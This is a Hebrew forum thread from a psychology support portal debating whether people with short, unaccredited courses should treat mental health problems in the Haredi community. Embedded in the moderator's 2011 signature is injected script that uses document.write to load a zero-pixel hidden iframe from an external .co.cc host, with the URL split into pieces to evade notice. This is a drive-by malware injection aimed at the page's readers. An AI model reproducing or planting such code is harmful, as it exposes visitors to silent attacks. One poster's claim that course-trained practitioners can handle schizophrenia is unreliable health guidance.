בית פורומים פורטל הנפש

פסיכולוגיה בגרוש

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-4/7/2011 15:34 לינק ישיר 
פסיכולוגיה בגרוש

שלום לכולכם רציתי לעלות פה תופעה לא כ״כ חדשה שרווחת יותר בציבור החרדי, אנשים או יותר נכון נשים שמחפשים פרנסה קלה או משהו כזה לוקחים קורס באיזשהיא נישה פסיכולוגית כגון קאוצ׳ינג וכדו׳ (למנות את כל ה״שיטות״ שפרחו לאחרונה א״א, יכלה הדף והם לא יכלו...) וזהו.. עכשיו הם מטפלים בנפשו העדינה והמתוסבכת של האדם. למה לא?! הם הרי ״למדו״ לא? אותי זה מקומם!! פסיכולגיה, גם אחרי שנות לימוד ונסיון מרובות עדיין לא כל אחד יכול באמת לעסוק בזה. כל מי שרק מתעניין בתחום רואה איזה היקף של ידע ורגישות זקוקים כדי לעזור לבן אדם ולהתהלך בין שבילי נפשו המפותלים!

דווח על תוכן פוגעני

נשלח ב-4/7/2011 16:03 לינק ישיר 

נכון מאאאאאאד! לדעתי האשמה היא בציבור החרדי ולאו דוקא באלה שעושים את זה.. עובדה שמגיעים אליהם לקוחות - והמון... זה מתאים לכל ה"מדיניות" החרדית (שנובעת בחלקה מחוסר ממון, אבל בהחלט לא רק) של ה"חלטוריסטיות" וה"מציאות" וחוסר דרישה ציבורית לאיכות, בכל כך הרבה תחומים.

למותר לציין שחוסר דרישה לאיכות בתחום זה שהעלת גובל בפלילים.

דדווח על תוכן פוגעני

נשלח ב-4/7/2011 16:15 לינק ישיר 

אשמח לתגובה של מנהלת הפורום

דדווח על תוכן פוגעני

נשלח ב-4/7/2011 16:56 לינק ישיר 

גרוסמן שלום
אני מאד מזדהה עם דבריך , מכירה את הנושא מקרוב וכואבת אותו. אחת המטרות שלי בהקמת פורום זה היא בדיוק בנקודה שהעלת. 
 כתבתי לאחרונה עם קולגה שלי מאמר באנגלית, כישפורסם אשמח להעלות אותו, שנוגע בתהליך שהחברה החרדית עברה בגישתה למקצועיות (תהליך דו סטרי).
אני נאלצת כרגע לעצור מסיבות טכניות, אך אשמח בהמשך להוסיף ולהתייחס לנושא.
אתם יכולים כמובן להמשיך את השיח החשוב הזה
בברכה

ד"ר רונית לזר - עו"ס קלינית
טיפול במבוגרים, נוער וילדים
אלעד, ירושלים
 נייד 052-6346334
******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי רוניתלזר ב- 14/07/2011 19:26:22

דדווח על תוכן פוגעני

נשלח ב-4/7/2011 18:28 לינק ישיר 

יכול להיות שזה נובע מיחס מזלזל למדע באופן כללי? אם ילד לומד לזלזל במדענים הטיפשים והכופרים האלו שמאמינים שבאנו מהקוף (פחחחחחחח), למה שהוא יקח ברצינות מדענים מתחומים אחרים? אולי בגלל זה יש גם פריחה של "רפואה" אלטרנטיבית אצל החרדים.

דדווח על תוכן פוגעני

נשלח ב-5/7/2011 11:10 לינק ישיר 

שטויות במיץ. במה זה פחות טוב מפסיכולוגיה? כמה מונחים לועזיים נתנו לך כנפיים? (כמה כנפיים? יכלה הדף והם לא יכלו...)

דדווח על תוכן פוגעני

נשלח ב-6/7/2011 08:54 לינק ישיר 

אתחיל בלימוד זכות- החברה החרדית ידועה בדרישה לאיכות ולרמה מקצועית גבוהה בתחומים מסוימים. תחום הרפואה הפסיולוגית היא המובהקת ביותר . הארגונים השונים כמו של הרב פירר, עזר מציון והרב בני פישר מלמדים על כך. אדם חרדי עשוי לשלם את מיטב כספו מכיסו הדל לרפואה פרטית (לאו דווקא במקרים קריטיים).

תחום הפסיכולוגיה היה במשך דורות מודר על ידי החברה החרדית כחלק מהתבדלותה מההשכלה, מהתרבות החילונית ומתפיסת האדם כאינדיבודאל ועוד. הטיפול בתחום הנפש  היה בעיקר בידי רבנים, יועצים רוחניים, וכל מיני נשים בקהילה .

בעשור וחצי האחרון עם הקמת המכללות החרדיות התפתחה המודעות, ההכרה והצורך בטיפול נפשי בידי אנשי מקצוע. אולם, מעניין שבאופן פרדוקסלי קמה תעשייה שלמה של מכונים וקורסים לא מוכרים ולא רשמיים  בעלי כותרות 'מקצועיות'. המילה פסיכולוגיה ונגזרותיה הפכה להיות אטרקטיבית וכל אחד שיודע להקים עמותה או עסק פותח מכון ומלמד 'מקצוע מבוקש' .

אני חושבת שהציבור היום בחלקו מבולבל ולא יודע להבחין בין איש מקצוע מומחה ומוסמך לבין מי שלא. יתר על כן, כיוון ש'הפסיכולוגיה' נהייתה נגישה לכל דורש , ישנה תחושה שכל מי שעוסק בייעוץ, בתמיכה הוא כבר מאן דאמר בתחום. והרי  מה ההבדל ללמוד פסיכולוגיה במוסד אקדמי מוכר  ל'פסיכולוגיה' במכון פרטי זה או אחר??!.. עיין ערך תגובתו לעיל של ללא_כחל .

לא מזמן פנתה אלי אם בנוגע לילדה שלה שבמצב קשה (לפי התיאור עלה בי חשד למקרה בספקטרום האוטיסטי) אשר מטופלת אצל 'מטפלת מקצועית' ו'אובחנה' על ידי 'מאבחנת מקצועית' מעולות במאבחנות באמצעות 'ציורים וכתב יד'. אותה אם באמת התכוונה לפנות לאנשי מקצוע ובעצת אנשים טובים שהפנו אותה 'למאבחנות שקולעות בדיוק' היא בנאיביות שלה חשבה שהילדה שלה בטיפול אצל אנשי מקצוע מומחים ומוסמכים.  

לא רק המטופלים מבולבלים אלא גם אלו שהולכים ללמוד את המקצוע. אני שמחה לגלות שוב ושוב התעניינות של אנשים במקצוע ורצון להתפתח בו, אך הבורות, הנאיביות ,הבלבול והחיפוש אחר קיצורי דרך ואינסטנט יוצרים לצערי את התופעה שתיארתם.

עם זאת, אי אפשר שלא להתפעל ולשמוח מאותם אלו שהולכים ללמוד בצורה מקצועית במוסדות אקדמיים רשמיים. כמרצה לסטודנטיות במכללה חרדית אני נרגשת לפגוש את המוטיבציה, ההשקעה, והרצון האמיתי שלהן להכשיר עצמן להיות אנשי מקצוע מומחים, מוסמכים, איכותיים ברמה גבוהה.

החברה עוברת תהפוכות ושינויים ואני מאמינה שגם בתחום זה המצב עוד ישתנה לטובה

בברכה

ד"ר רונית לזר - עו"ס קלינית
טיפול במבוגרים, נוער וילדים
אלעד, ירושלים
 נייד 052-6346334
< type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-12/7/2011 23:36 לינק ישיר 

על זה נאמר 'הדרך לגהינום רצופה כוונות טובות'
לעיתים ה'כוונות הטובות' הם פשוט רצון להתפרנס בקלות
שום אדם בר דעת לא יפקיד את גופו אצל איזה רופא אליל, נניח בכדי שיבצע בו ניתוח מסובך
הנפש לא גרועה מן הגוף ומורכבת לא פחות ואף יותר
כנראה המצוקה והרצון הבוער להשתחרר ממנה הם הגורמים לנתינת אימון במי שלא ראוי לכך 
במיוחד שמי שאינו איש מקצוע מוסמך בדרך כלל לא מודע לגודל האחריות שנקלעה לידיו, בגלל שלא למד ואין לו באמת מושג, לכן קל לו ג"כ להפריח הבטחות למהפך דרסטי ולדבר על אחוזי הצלחה גבוהים במיוחד
אני כותב בהכללה מתוך כאב על בן משפחה שבילה את זמנו אצל  מקצרי דרך למיניהם ובזבז אנרגיות וסכומי עתק, לשוא

דדווח על תוכן פוגעני

נשלח ב-9/2/2016 17:25 לינק ישיר 

MAKPISH כתב:
/PISH/

דדווח על תוכן פוגעני

נשלח ב-9/2/2016 17:26 לינק ישיר 

MAKPISH כתב:
/PISH/

דדווח על תוכן פוגעני

נשלח ב-16/2/2016 23:31 לינק ישיר 

יש הרבה מקרים קלים ובינוניים
של דאגות ואף חרדות וכולי
שמטופלות היטב
על ידי שיחה עם חבר,

או טיפולי סי בי טי
או אי אף טי
או שלושת המימדים וכדומה.

לא לכל בעיה חייבים פסיכולוג.
וגם הפסיכולוג
לא תמיד מצליח,
ואף עושה טעויות
וטעויות קשות -

הוא פסיכולוג אז מותר לו לטעות ..

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-19/2/2016 10:43 לינק ישיר 

וזה הגיוני ומקובל
שגם מטפל מנוסה בשלושת המימדים
יטפל בסיכזופרניה,

כמו שראיתי מטפל כזה
בקורס שלושת המימדים שלמדתי,

תורת התרפיה - לא ניתנה לפסיכולוגים
ופסיכאטרים בלבד,

"ובלבד" שהמטופל והמטפל
יהיו בקשר רציף
עם הרופא.

הגיע הזמן
לשיטות מוצלחות יותר
מפסיכולוגיה ופסיכולוגים
שיודעים למשוך זמן
ולבקש כסף רב,

ולפי דעתי ונסיוני הצנוע,
לא נראה לי
שפסיכולוג עוזר כל כך,
וחבל להפסיד את השיטות המהירות והיעילות שיש היום להציע, ולהתקדם פי אלף.

מה גם שברוב המקרים
אנחנו פונים לטיפול בבעיות קלות יחסית,
ואז וודאי שאין צורך בפסיכולוג מומחה
עם תארים וותק רב.

אלא מה ?...
ברור שחייבים לפנות למטפל מוסמך
עם קבלות.

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-23/2/2016 19:47 לינק ישיר 

uu

דדווח על תוכן פוגעני

נשלח ב-24/2/2016 09:03 לינק ישיר 

מסכימה עם רציף.
נראה לי שלמציאות יש כאן הרבה מה לומר.
הן מבחינת המטפלים -
אנשים חרדים שרוצים ללמוד מקצוע טיפולי, נאלצים לעבור מרוץ מכשלים של האקדמיה  שאינו מותאם ליכולות הציבור. אישה חרדית שצריכה ללמוד סטטיסטיקה והסתברות  תוך כדי החלפת טיטולים, תצטרך לפרוש מהר מאד, גם אם נחונה ביכולת טיפולית גבוהה.
והן מבחינת המטופלים - לשלם מאות רבים של שקלים לטיפול פסיכולוגי יוקרתי, זה כמעט בלתי אפשרי בציבור החרדי.
מה זה אומר? שצריך ללכת לסנדלרים? נראה לי שבעיקר זה אומר שיש הרבה שלוחים למקום, בהתאם למציאות שהמקום סידר לאדם.

אני אומרת את זה קצת בנימה אישית, אחרי סידרה של פגישות עם דוקטורית יוקרתית (חילונית דווקא...) רבת פעלים שהצליח לפגוע בי הייטב... ולאחריה הלכתי למישהי אחרת שהסכימה להיות ענווה, להודות במה שהיא לא יודעת ולהקשיב לי בשקט, והיא עזרה לי באמת.
אז נכון שאני לא סכיזופרנית ברוך השם והבעיה שלי לא מידי עמוקה אבל... הרבה שלוחים כבר אמרנו...

דדווח על תוכן פוגעני

נשלח ב-2/3/2016 10:16 לינק ישיר 

לפנות למטפל שעבר קורס
זה לא ברירת מחדל,

לא פעם "המטפלים של הקורסים"
יעילים יותר
פי מאה ופי אלף,

ויש לי נסיון אישי
ב"אי אף טי"
ובשלושת המימדים,

כולנו מכירים את זה,
שחבר טוב
פקח ונבון
שמקשיב לנו,
עוזר הרבה הרבה יותר
מאשר פסיכולוג עם תוארים.

לפסיכולוגיה יש הססנות
לא מובנת,
ומתקדמים לאט
אם בכלל,

הם גם לא טורחים כל כך
לשתף את המטופל
בתהליך הטיפולי.

וחשוב להגיע למטפל משלנו
שלא מתגאה עלינו
ומבין את אורחות חיינו,

למטפלים משלנו יש
ענווה ומסירות,
ולא פעם נוצר קשר חברי אישי
שבו המטפל מתעניין
ושופע מחמאות על המטופל,
את זה לא לומדים באוניברסיטה..

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-13/4/2016 23:29 לינק ישיר 

אין יותר מדי מה לעשות עם זה, אין דרך לחייב אנשים ללמוד פסיכולוגיה מתכונתה המסורתית.
אומן שונא את בני אומנותו, ואכן, אחרי שאנחנו משקיעים שנים בלימודים וכו וכו
מגיעים אנשים שטוענים לכתר שלנו אחרי שלושה חודשי לימוד בלבד..
מבאס בעליל....

אני רק יציין, שהנטישה של הפסיכולוגים והמעבר לטיפולים במתכונת מהירה (או לפחות מתיימרים לפתור בעיות במהירות) הוא בחלקו תוצאה של האכזבה שהפסיכולוגיה הנחילה לכלל.
ראו תגובות הגולשים באשכולות סמוכים : הייתי אצל עשר פסיכולוגים ולא עזר.
אנשים חשים צורך למצוא תחליף.

כל אחד יעשה את השיקולים שלו וילך לאיש המקצוע שמתאים לו.

דדווח על תוכן פוגעני

בית > פורומים > קבוצות תמיכה > פורטל הנפש > פסיכולוגיה בגרוש
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext